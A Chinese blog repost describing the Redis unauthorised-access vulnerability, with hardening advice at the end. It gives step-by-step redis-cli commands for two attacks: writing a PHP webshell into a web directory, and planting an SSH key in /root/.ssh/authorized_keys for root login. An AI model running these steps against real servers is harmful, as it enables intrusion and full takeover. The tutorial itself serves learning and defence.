博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
redis访问未授权漏洞
阅读量:3754 次
发布时间:2019-05-22

本文共 751 字,大约阅读时间需要 2 分钟。

漏洞成因:

  1. 默认绑定在0.0.0.0:6379 且没有添加防火墙规则,导致暴漏在公网中
  2. 没有设置密码认证,(一般为空),可以免密码远程登录redis服务。
    漏洞危害:
  3. 无需认证,直接登录。导致敏感信息泄露
  4. 写入木马。
启动redisredis-server /etc/redis.conf

在这里插入图片描述

利用方式:常用第一种

1)写入webshell

需要拥有读写权限

需要知道web目录,AWD中目录一样。
进入redis的src目录,执行登录命令
./redis-cli -h 目标ip
启动redis

执行以下命令进行写入webshell

config set dir /var/www/html     指定写入目录config set dbfilename shell.php  指定shell文件名set webshell "
" 指定shell内容save或bgsave

就可以成功在/var/www/html写入shell.php文件

2)利用"公私钥"认证获取root权限

使用条件:靶机redis需要以root权限运行

攻击机生成ssh公钥和私钥,密码设为空
在这里插入图片描述

进入.ssh,将生成的公钥保存到1.txt

在这里插入图片描述

连接靶机redis服务

将存有ssh公钥的1.txt写入redis。
在这里插入图片描述

登录redis靶机,获得redis备份路径

在这里插入图片描述

更改redis备份路径为ssh公钥存放目录(默认为/root/.ssh)

在这里插入图片描述

设置上传公钥的备份文件名字为authorized_keys:

在这里插入图片描述

保存并退出

在这里插入图片描述

使用ssh免密登录

ssh -i id_rsa root@192.168.0.104

加固方式:

1) 设置密码
编辑etc/redis.conf
添加密码

requirepass 密码

2) 设置访问IP

开启ip绑定
在这里插入图片描述

最后重启redis

转载地址:http://cjlsn.baihongyu.com/

你可能感兴趣的文章
VC++深入详解 - 窗口的创建
查看>>
SystemParametersInfo ( SPI_GETNONCLIENTMETRICS... 在VC 2008 里不能正常工作
查看>>
读取其它进程richedit控件的内容
查看>>
Richedit使用大全
查看>>
周边控件
查看>>
c语言获取时间
查看>>
Visual C++常用数据类型转换详解
查看>>
VS2008在工具栏Toolbar里添加XP风格spin box control
查看>>
MFC中处理消息的顺序
查看>>
VC中一些手动发送消息的汇总
查看>>
VC中使用ListCtrl经验总结
查看>>
获得窗口并枚举其子窗口
查看>>
理解First Chance和Second Chance避免单步调试
查看>>
CLR Debugger - 在程序抛出异常的时候中断程序的执行
查看>>
如何定位导致Crash的代码位置
查看>>
zz bpf过滤规则
查看>>
SubVersion定期完整备份脚本(Linux)
查看>>
SVN备份策略
查看>>
VC——位图的透明显示
查看>>
如何删除svn备份库
查看>>